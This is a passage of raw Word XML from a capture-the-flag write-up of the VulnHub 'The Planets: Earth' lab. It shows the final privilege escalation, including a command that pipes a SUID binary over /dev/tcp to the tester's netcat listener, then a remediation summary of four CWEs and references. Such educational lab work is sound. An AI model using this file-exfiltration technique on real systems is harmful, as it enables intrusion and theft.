        <w:t xml:space="preserve"> I found the reset_root executable.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="267335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5945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With </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /usr/bin/root_reset &gt; /dev/tcp/192.168.239.6/3000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and netcat listening on port 3000 I downloaded and ran the file with ltrace to check what is missing. Using the touch command I created new files and re-ran the script.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="267335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5945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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="267335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5945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Now with root’s password I was able to log in as root and retrieve the last flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="267335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5945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heading=h.o5vzxk49yirg" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As a result of this assessment there are several vulnerabilities ( CWEs ) that are worth knowing in the real world. Abusing them led me from an unauthenticated user to a logged in user with full admin control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5y23cpuk3z50" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation</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CWE-425 ( Broken Access Control via Directory Enumeration and Forced Browsing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6">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Proper authentication and authorisation on most important endpoints or even all, proper file management ( remove unnecessary files from the web root ), implementing WAF ( Web Application Firewall ) to block brute-force directory scanning.</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CWE-94 ( Remote Code Execution (RCE) via Filter Circumvention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Instead of blacklist ( disallow list ) using whitelist ( allow list ) and validate IP addresses, sandboxing for isolating the app </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from the rest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the system and improving WAF settings.</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CWE-200 ( Sensitive Information Disclosure in Frontend Metadata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Never store sensitive information in source code, metadata, client-side code. Always validate after production.</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CWE-269 ( Local Privilege Escalation via Insecure Executable File )</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Removing unnecessary SUID, principle of least privilege for all users, adding monitoring and alerting system on changes of SUID binaries or execution of commands like passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.q8fz382r3uj1" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References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pacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="467886"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/200.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; CWE-200 information page</w:t>
      </w:r>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0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="467886"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/94.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; CWE-94 information page</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0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="467886"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/269.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; CWE-269 information page</w:t>
      </w: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after="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="467886"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/425.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; CWE-425 information page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ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="467886"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.vulnhub.com/entry/the-planets-earth,755/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; Vulnhub The Planets: Earth page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3.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cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/269.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/9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www.vulnhub.com/entry/the-planets-earth,755/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/425.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YiWmWUkEYrhmvNuCta7QnEkDvA==">CgMxLjAyDmguNGtiMno3YjBzZ2o0Mg5oLnhhMmk1ZzZzYzdyYzIOaC5uYmIyeWJrY3R1YnQyDmgucXJ0bjh5NjM3NjdlMg5oLmN1NG9oczZ4MmdyODIOaC5vdHJxaGRoaHZ6ZWoyDmguYzVqbXZlejNkZGZqMg5oLnEzY3hrN245ZHYwNTIOaC5yZXBiMmNzbHI3YnkyDmgubmFrcTdjMTNhaDUxMg5oLmpocnJ1b2R6eDJtYjIOaC55aHQ5ang3OXAxamkyDWguZHpheXQ2a3g1ZTUyDmgudHdrMzJhYTM4ZnNsMg5oLm81dnp4azQ5eWlyZzIOaC41eTIzY3B1azN6NTAyDmgucThmejM4MnIzdWoxOAByITEwQmdQU1V1N1FGQUYtRU5qWjZkYmlUZTNKLTBaZS1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